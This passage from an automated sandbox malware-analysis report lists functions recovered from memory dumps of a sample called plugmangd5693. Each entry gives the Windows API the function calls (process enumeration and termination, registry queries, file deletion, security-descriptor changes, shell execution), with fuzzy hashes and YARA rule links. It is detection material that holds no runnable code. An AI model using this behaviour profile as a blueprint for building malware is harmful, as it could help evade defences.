Instruction Fuzzy Hash: 0521F57550D3C06FD3138B259C51B62BFB8EF87A10F0981CBE8848B693D2256919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 002FBB22, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 002FBBA1

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e7a9594801b4367586ff0c6f06fd7e355abc603febb1ce8ec64c96e7ac38d73
Instruction ID: 06ec93e97d9ebeb0ab780d5e193fd8a4d17e2469f035ea4ae42842d0674dcc0b
Opcode Fuzzy Hash: 4e7a9594801b4367586ff0c6f06fd7e355abc603febb1ce8ec64c96e7ac38d73
Instruction Fuzzy Hash: 2721AC75500308AFEB21CF65DC85B66FBE8EF08354F0484AAEE498A656E371E814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FAF06, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E40), ref: 002FAF77

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: ab6e2c6d54114e63df81150df36b2b6e3c98998c7df0bb27901a466e4f24faec
Instruction ID: d970c0db729e4f4b2c6de60fa56b52b21a3d29f3b40e34129e805e01ed959454
Opcode Fuzzy Hash: ab6e2c6d54114e63df81150df36b2b6e3c98998c7df0bb27901a466e4f24faec
Instruction Fuzzy Hash: 6121A4B2600304AFF720DF69DC45F7AFBECEF04350F04856AED49DA641D671E9148A62

Uniqueness

Uniqueness Score: -1.00%

Function 01D01C59, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 01D01CF6

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 258fc8d2f2689bd27693211dce2f861e6893b2792296cc2ba5a6b170a0f8b3fd
Instruction ID: 91cdfe55c6b1f525de76d922bc00622da503d6206932710e9794fdfa3fddd872
Opcode Fuzzy Hash: 258fc8d2f2689bd27693211dce2f861e6893b2792296cc2ba5a6b170a0f8b3fd
Instruction Fuzzy Hash: 8321AF7140E3C16FD3128B259C55B62BFB4EF87610F1A81CBD8848F293D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 002FADFA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FAE8C

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 03adf5790e360fb276222d20e955ca6c4541b102c2df21e24c74b9eb64650e0f
Instruction ID: a0f589c37fba7b480aed7261409fb0a428c34f0885c2295de2fe79e7ad38767d
Opcode Fuzzy Hash: 03adf5790e360fb276222d20e955ca6c4541b102c2df21e24c74b9eb64650e0f
Instruction Fuzzy Hash: 8E21B072504344AFE721CF15CC44F63FBF8EF05750F0889AAEA498B292C264E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FAB5A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 002FABD9

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4a119953e8cea32f768a8434d487826fdf7ccb9adeb1f828ac489e8984c3de98
Instruction ID: 1b780390d539f2dd3f63a5daa8991145a8daf2637e87348f5bfed63a1bcc5397
Opcode Fuzzy Hash: 4a119953e8cea32f768a8434d487826fdf7ccb9adeb1f828ac489e8984c3de98
Instruction Fuzzy Hash: 8121A1B2510304AFF721CF55DC84F7BFBACEF14350F0485ABEA499B241D660E9589AB2

Uniqueness

Uniqueness Score: -1.00%

Function 002FB406, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 002FB479

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 578ac766af0cdd5c4943d046f9d18deb63fc67b6ac91e4769c8643afdda5577e
Instruction ID: 1192b1ea87967ebe953b01f3dedd6db0fbb1f610082dd3758eff9b2273329b4a
Opcode Fuzzy Hash: 578ac766af0cdd5c4943d046f9d18deb63fc67b6ac91e4769c8643afdda5577e
Instruction Fuzzy Hash: 04217C71610304AFF721DF65DD85B66FBE8EF04750F1484AAEA888B242D375E914CA71

Uniqueness

Uniqueness Score: -1.00%

Function 01D01571, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?), ref: 01D015F3

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 37b15259498d2992a579e8ef841446f2677eff8669cac91d8e92010975f0d921
Instruction ID: 8311d68db65195b2435beda5a739000138c97bd8fc72ecac0db3d4b7203871e2
Opcode Fuzzy Hash: 37b15259498d2992a579e8ef841446f2677eff8669cac91d8e92010975f0d921
Instruction Fuzzy Hash: 512190715097809FEB22CF25DC44B56BFF8EF06710F08859AE9858F2A3D275E809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FBDAA, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FBE29

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 989ddf349d14636729ffe0389aa4fc2703c0345b8b9385b94c35d8760b7eedba
Instruction ID: 666567dfd9b62519698bafd2de2fec19d14383deea432a8f40ee49b15fcbeffd
Opcode Fuzzy Hash: 989ddf349d14636729ffe0389aa4fc2703c0345b8b9385b94c35d8760b7eedba
Instruction Fuzzy Hash: 6B21A472405344AFEB22CF55DC44FA7FFB8EF45710F0885AAEA459B152C235A908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 002FAC62, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FACDC

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 066e8d100ee1b7aec7c3bd2476e5d7819f9d36c1b3e8ede3144e847e219ae873
Instruction ID: a186738cc9e7e2753c68eeb2b0cd3515e434e622422cfc9f098fe7924fe48979
Opcode Fuzzy Hash: 066e8d100ee1b7aec7c3bd2476e5d7819f9d36c1b3e8ede3144e847e219ae873
Instruction Fuzzy Hash: C021CDB1210304AFF720CF15CC84F76FBECEF04750F0485AAEA4A8B652D660E958DA72

Uniqueness

Uniqueness Score: -1.00%

Function 01D0258A, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 01D025F4

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 61ddbf5b9812463be428dff9bebe971e7775e4ef77a353e446d67d04b3084547
Instruction ID: c0cd9671994ab47638b22c34bd1e2fdeea7b4bbdd456c69cafc83ccd38a5b830
Opcode Fuzzy Hash: 61ddbf5b9812463be428dff9bebe971e7775e4ef77a353e446d67d04b3084547
Instruction Fuzzy Hash: A811A271501304AFFB21CF55DC45FAAF7ACEF04320F0489AAE949DA181D674E944CB71

Uniqueness

Uniqueness Score: -1.00%

Function 01D02A1F, Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 01D02A8C

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 806d918e1dee084c98a976e7ca2b417070140285ae6f3badd0a191eccc8b1b88
Instruction ID: 7f54b6f1450969a98506df07e1c1b7b1962371724af556964bcc5abdae1c0439
Opcode Fuzzy Hash: 806d918e1dee084c98a976e7ca2b417070140285ae6f3badd0a191eccc8b1b88
Instruction Fuzzy Hash: 2521A1755093C05FD7128B25DC55B52BFB4DF06220F0980DBED44CF293D224A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 002FB162, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 002FB1D6

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: f51591d2fa2742da87dd1bb8ce2802b7179a56ee2fc757db9d739a8e757e6e4e
Instruction ID: 99c2ff3de74e5fdbbcd8d19398ae8cb0b94d246ae8a41439647e3414963ea174
Opcode Fuzzy Hash: f51591d2fa2742da87dd1bb8ce2802b7179a56ee2fc757db9d739a8e757e6e4e
Instruction Fuzzy Hash: F3219D71500304AFF722CF95DC45BAAFBE8EF08310F0485AAEA898B241D371A914DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02AD3, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 01D02B46

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 22034299a9bb9d6b73a88b1abb972c802950080a0066bd73725b8e25a974bdae
Instruction ID: 4ca79052fc3a0374191fe01697763293e0b790f8d522da4f75153bf806ae46da
Opcode Fuzzy Hash: 22034299a9bb9d6b73a88b1abb972c802950080a0066bd73725b8e25a974bdae
Instruction Fuzzy Hash: 802192755097809FD712CF65DC85B92BFE4EF06320F0984EAE948CB1A3D2359908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FAE1A, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FAE8C

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 311d4bbd025f53c34d734b0a89dca80956ca1d9d5ac1712fb7c6645497794f17
Instruction ID: 9fdb040446ad3dce62de3330cb173cb621016c8acf9b34c4d194ad05b3dc5405
Opcode Fuzzy Hash: 311d4bbd025f53c34d734b0a89dca80956ca1d9d5ac1712fb7c6645497794f17
Instruction Fuzzy Hash: A411BEB2510704AFE721CF55CC84F76FBE8EF04760F0489BAEA498A252D670E954DA72

Uniqueness

Uniqueness Score: -1.00%

Function 01D008ED, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 01D00969

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 7ccc09d6d125fb22754faa8cf4ea64334fd8e8d7bd6782cc26217236238da0ab
Instruction ID: 25b374825438e70a1402a24de3e3473b2fcd3bfc2d48a135b284e9991de766a8
Opcode Fuzzy Hash: 7ccc09d6d125fb22754faa8cf4ea64334fd8e8d7bd6782cc26217236238da0ab
Instruction Fuzzy Hash: FE219375509780AFE7228B15DC45B62BFE8EF46610F09809AED848B293D265E408C771

Uniqueness

Uniqueness Score: -1.00%

Function 01D02062, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 01D020CE

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: eb19dc737d0bd8bea2a637e46d12e5217c038dfe0ab36e476de377c2be51330d
Instruction ID: bb7c8e0ee70a4bcac16f880c4d1f3743d8f50378ffcc2064bead83f37bbe8ce5
Opcode Fuzzy Hash: eb19dc737d0bd8bea2a637e46d12e5217c038dfe0ab36e476de377c2be51330d
Instruction Fuzzy Hash: 6C2163756017049FE721CF69DC88B56FBE8EF08710F0885AADD49CB292D370E444CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FB7D6, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FB835

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 994b138eedf667df125014e6a01450faf5be15bbdc91f5bf165b07f7855ec722
Instruction ID: cdc257786828cb586c02a483f9b5f2c5c51bc9e11d9c064c55a1ec69084daac9
Opcode Fuzzy Hash: 994b138eedf667df125014e6a01450faf5be15bbdc91f5bf165b07f7855ec722
Instruction Fuzzy Hash: BD11D072500304AFFB21CF55DC44F7AFBA8EF44360F1485AAEA098A651D670E954DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01D02D11, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 01D02D85

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2c9867b03a220df3ef3e01471d2a49e2be57b205c3273c28b71f12be1c08c313
Instruction ID: f298e40a6343758d477b062806f92b795f68cd64d92e2878f1b3ffaa941e05c5
Opcode Fuzzy Hash: 2c9867b03a220df3ef3e01471d2a49e2be57b205c3273c28b71f12be1c08c313
Instruction Fuzzy Hash: AD216D725097C09FDB138F25DC54A91BFB4EF07320F0985DAE9848F563D265A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 01D02BCA, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 01D02C20

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c97287fb104671df7d2f34d05a08edf82db16401f63955f903755b531d47144c
Instruction ID: ffc0162ffd301f1601f1516dc2fbfc324adebf8382222921b52afc4eb5aad1e1
Opcode Fuzzy Hash: c97287fb104671df7d2f34d05a08edf82db16401f63955f903755b531d47144c
Instruction Fuzzy Hash: D011C271501304AFFB11CF59DC89BAAFB98EF44720F0484AAED09DB282D674E9448AB5

Uniqueness

Uniqueness Score: -1.00%

Function 002FBDCA, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FBE29

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e4303259f0606d05892d4294f95a4fc810fe16e56721197e01e43a353cbf8e6d
Instruction ID: 65e34612b8dc8f45e89207882ee49a17aa94bd3554f121f3c8992bc59e4514c5
Opcode Fuzzy Hash: e4303259f0606d05892d4294f95a4fc810fe16e56721197e01e43a353cbf8e6d
Instruction Fuzzy Hash: 3411E231400304EFFB21CF54DC44FAAFBA8EF04720F0485AAEA098A252C270A5148B71

Uniqueness

Uniqueness Score: -1.00%

Function 01D00845, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 01D008AC

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: 5b28a853a5f61b845a2834a757d497499b63995ba00656065f541d6ac0094513
Instruction ID: b96e467f6b2976cf9aabc1f0fdba9e401c111a91956b70febae9b8970de887c9
Opcode Fuzzy Hash: 5b28a853a5f61b845a2834a757d497499b63995ba00656065f541d6ac0094513
Instruction Fuzzy Hash: 4C117F72909380AFE712CB25DC45B92BFE4EF46210F0985DAE9858F253D279E508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D0297C, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 01D029D8

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 29feed9032b4f17c5158a1ad775148bebc9ab0c31f5b91b8a0524a5340377c91
Instruction ID: 28957574fc4a1781732ddefb5a01bfbd309d1d56d6542de415aedae8c77cbdce
Opcode Fuzzy Hash: 29feed9032b4f17c5158a1ad775148bebc9ab0c31f5b91b8a0524a5340377c91
Instruction Fuzzy Hash: DB11B2715093809FD712CF29DC89B52BFA8DF46220F0880EAED49CB293D274E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02215, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 01D02277

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9137cee101fc824afab1dc352adfc62396ff6081d2ec8f4aa14aa2335ff9caca
Instruction ID: 058d0f1f18d8a7c18b759b50bb5f0ec23ea447647ba60ef1612be9dafb3128a0
Opcode Fuzzy Hash: 9137cee101fc824afab1dc352adfc62396ff6081d2ec8f4aa14aa2335ff9caca
Instruction Fuzzy Hash: AA11D3765093809FEB12CB69DC89B52FFE8EF45320F0884AAED44CB253D235D504CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D030A3, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 01D0310D

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e7a29916bb19bb275a0aecd11c21fced22fe60d8a50b7f21cbfc3332f1b4db0c
Instruction ID: 18ce01f038cbd251645f81daf9b4e7349e5b5f86b3916fb3e08b97d5a3852635
Opcode Fuzzy Hash: e7a29916bb19bb275a0aecd11c21fced22fe60d8a50b7f21cbfc3332f1b4db0c
Instruction Fuzzy Hash: 4311BE72508780AFDB228B15DC45B52BFB4EF0A220F08849EED854B2A3D275A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 01D00010, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 01D00076

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0a61e94720db02de969f99aa0c8c256c228cd798c7e67dbd8fa918871acf04d0
Instruction ID: 71f4229bbe4e850cf6efbe9703d9533602a19ac333b8fe8102fa261b5589740c
Opcode Fuzzy Hash: 0a61e94720db02de969f99aa0c8c256c228cd798c7e67dbd8fa918871acf04d0
Instruction Fuzzy Hash: 05118132404780AFDB22CF55DC44B52FFF4EF4A220F08899EE9898B563D275A418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 002FAA9A, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 002FAAF8

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5eb9101684285ac2352317cca6faf02dbc371c2340b33d55f56360134512f662
Instruction ID: f809afb1ed5fde4552cb871ee475945cf5f097533972cbdabff79ca8b6f8b170
Opcode Fuzzy Hash: 5eb9101684285ac2352317cca6faf02dbc371c2340b33d55f56360134512f662
Instruction Fuzzy Hash: ED11E3B15093C4AFE7128B15DC44B61FFB4EF42764F0880DBED888B253C225A818CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01D01BB6, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D01BFE

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d095190cb25332adae9673989bebc0ec88a43ad4e06a969bb740f2a21447484c
Instruction ID: 2c1516da7494a64c188de1e8166a2c85a289894a423c74fb5efdc320e5be4648
Opcode Fuzzy Hash: d095190cb25332adae9673989bebc0ec88a43ad4e06a969bb740f2a21447484c
Instruction Fuzzy Hash: A511A1716043008FEB11CF69D885B66FBD8EB04320F0884AAED49CB282E274E444CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02152, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 01D0219A

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: d095190cb25332adae9673989bebc0ec88a43ad4e06a969bb740f2a21447484c
Instruction ID: 09997da998775bc1f952243043e9f0a05993b74f292e3aee716cac56c08c7b8b
Opcode Fuzzy Hash: d095190cb25332adae9673989bebc0ec88a43ad4e06a969bb740f2a21447484c
Instruction Fuzzy Hash: 96118875A013409FE721CF59DC89766FBE8EF44720F08C5AADE49CB782D674D444CA62

Uniqueness

Uniqueness Score: -1.00%

Function 002FBC3A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E40,9385981B,00000000,00000000,00000000,00000000), ref: 002FBC8D

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 46d5761d4f158425bad358c3ab277d77247100b13dea6cc3e20bb18ef201d02a
Instruction ID: d348fe55d1689c301e2cae0f5a2fe24a4feaac8dc9b9ede04f795c9ed604b3fa
Opcode Fuzzy Hash: 46d5761d4f158425bad358c3ab277d77247100b13dea6cc3e20bb18ef201d02a
Instruction Fuzzy Hash: 0D01C071510304AFF721CF45DC85BBBFBA8DF44760F14C1A7EE089B281DA74E9449AA1

Uniqueness

Uniqueness Score: -1.00%

Function 01D015A2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?), ref: 01D015F3

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 39545afcf690b7a935520a04e03869706b8f90943a93733ba58316658c4e30af
Instruction ID: ef9f6bbb52a96c4b09f286ab747fb4848bd0fbeb5b1ca4e95dcb2f17d17dd26e
Opcode Fuzzy Hash: 39545afcf690b7a935520a04e03869706b8f90943a93733ba58316658c4e30af
Instruction Fuzzy Hash: 931170755007049FEB21CF59DC84B66FBF4EF08320F0884AADD4A8B652D375E404CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02B06, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32 ref: 01D02B46

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 8b5e97af0d1991ad0212090dace0710c913b5630b7f75d471d534270e4300794
Instruction ID: 851cdd8698f145529bebf5b70c9c3897d5c79280a64449201890607005ebf272
Opcode Fuzzy Hash: 8b5e97af0d1991ad0212090dace0710c913b5630b7f75d471d534270e4300794
Instruction Fuzzy Hash: 1711D2715017448FEB21CF69D889B66FBE4EF08320F08C4AADD4DCB296D234E544CB61

Uniqueness

Uniqueness Score: -1.00%

